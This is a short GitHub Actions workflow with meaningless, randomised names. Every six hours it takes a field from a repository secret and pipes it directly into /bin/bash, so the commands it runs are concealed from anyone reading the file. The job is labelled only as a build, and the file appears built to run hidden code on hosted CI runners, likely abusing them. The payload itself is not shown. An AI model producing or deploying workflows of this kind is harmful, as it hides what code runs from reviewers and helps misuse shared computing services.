name: duankehu6718

on:
  workflow_dispatch:
  schedule:
    - cron: '11 2/6 * * *'

jobs:  # 26297
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duankehu6718
        env:
          gd75036: ${{ secrets.gd75036 }}
        run: |
          echo $gd75036 | jq -r .umhll08 | /bin/bash
          echo $zic4 | jq -r .zoupl1 | /bin/bash
          echo $uc24 | jq -r .tik2 | /bin/bash

